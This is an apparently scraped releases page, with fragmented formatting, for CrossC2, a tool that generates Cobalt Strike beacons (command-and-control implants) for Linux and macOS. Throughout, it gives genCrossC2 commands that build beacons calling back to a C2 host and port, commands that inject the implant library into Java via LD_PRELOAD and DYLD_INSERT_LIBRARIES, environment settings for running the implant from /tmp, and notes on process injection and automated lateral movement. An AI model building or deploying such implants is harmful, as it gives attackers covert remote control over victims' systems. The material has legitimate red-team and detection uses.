generate CobaltStrike's cross-platform payload
Bot releases are visible (Hide)
Published by gloxec about 1 year ago
Published by gloxec about 1 year ago
Published by gloxec about 1 year ago
Published by gloxec over 1 year ago
id
of http-post
in the c2profile is in the header positionAdd automatic parsing of Malleable C2 Profile
, you can specify C2Profile
to let genCrossC2
generate beacon
genCrossC2 127.0.0.1 4444 cs_key ;config.ini;c2profile.profile@second-section Linux x64 ./beacon
For more details, see the page of release v3.1.1
Published by gloxec over 1 year ago
python-import
under Python2
Add automatic parsing of Malleable C2 Profile
, you can specify C2Profile
to let genCrossC2
generate beacon
genCrossC2 127.0.0.1 4444 cs_key ;;c2profile.profile Linux x64 ./beacon
genCrossC2 127.0.0.1 4444 cs_key ;config.ini;c2profile.profile@second-section Linux x64 ./beacon
In the console:
genCrossC2 127.0.0.1 4444 cs_key ";;c2profile.profile" Linux x64 ./beacon
genCrossC2 127.0.0.1 4444 cs_key \;\;c2profile.profile Linux x64 ./beacon
In the parameter position of rebind_dynamic_lib
, the position of C2Profile
is newly added, and the parameter separator of each configuration file is changed from :
to ;
rebind.so:config.ini
-> rebind.so;config.ini
Published by gloxec over 2 years ago
rebind_dynamic_lib
as an absolute path when running genCrossC2.exe
under Windows. (The issue will cause a bug in the automatic generation of beacons in GUI plugins).genCrossC2 127.0.0.1 5555 cs_key null:config.ini MacOS x64 a.out
Published by gloxec almost 3 years ago
CS4.4:genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out stager 4.4
CS4.0~4.3: genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out
Published by gloxec about 3 years ago
bls
data errorbawait_upload
& bawait_upload_raw
functions to support function callback after successful file uploadProcessList
interface, right click to perform beacon injection to the specified process (tested on Ubuntu)Target
interface, right-click the host or host list to perform automatic lateral movement.DYLD_INSERT_LIBRARIES=./libbeacon.dylib java
LD_PRELOAD=./libbeacon.so java
Published by gloxec about 3 years ago
LD_PRELOAD=./libbeacon.so java
export CC_BG=1
)export CC_BG=1 && LD_PRELOAD=./libbeacon.so java
Published by gloxec about 3 years ago
windows
platform when rebinding the protocol library #117[config]: alive
will not be displayed by default, and it can be turned on with export CC_DEBUG=1
#78Published by gloxec over 3 years ago
Published by gloxec over 3 years ago
bcd
, bls
, bupload
and other functions in multi-instruction merge tasks, now you can process the same cna scripts as windows beacon. #81CCHOST
& CCPORT
)export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
bupload
function. https://github.com/gloxec/CrossC2/issues/81#issuecomment-841068719
Published by gloxec over 3 years ago
- export CCPATH=/opt/ && /tmp/c2
(Mandatory setting of a working directory with permissions for beacon, such as/opt/
)- /tmp/c2 /tmp/c2-rebind.so
(Mandatory loading of communication protocol library for beacon)
Published by gloxec over 3 years ago
downloads
command to view the progress)/tmp/
directory file permissions on the low-version kernel system do not have the execute permission by default, which causes the beacon
to fail to startbeacon
is repeatedly online on a low-version kernel systemPublished by gloxec over 3 years ago
Published by gloxec almost 4 years ago
Published by gloxec about 4 years ago
Published by gloxec over 4 years ago
Published by gloxec over 4 years ago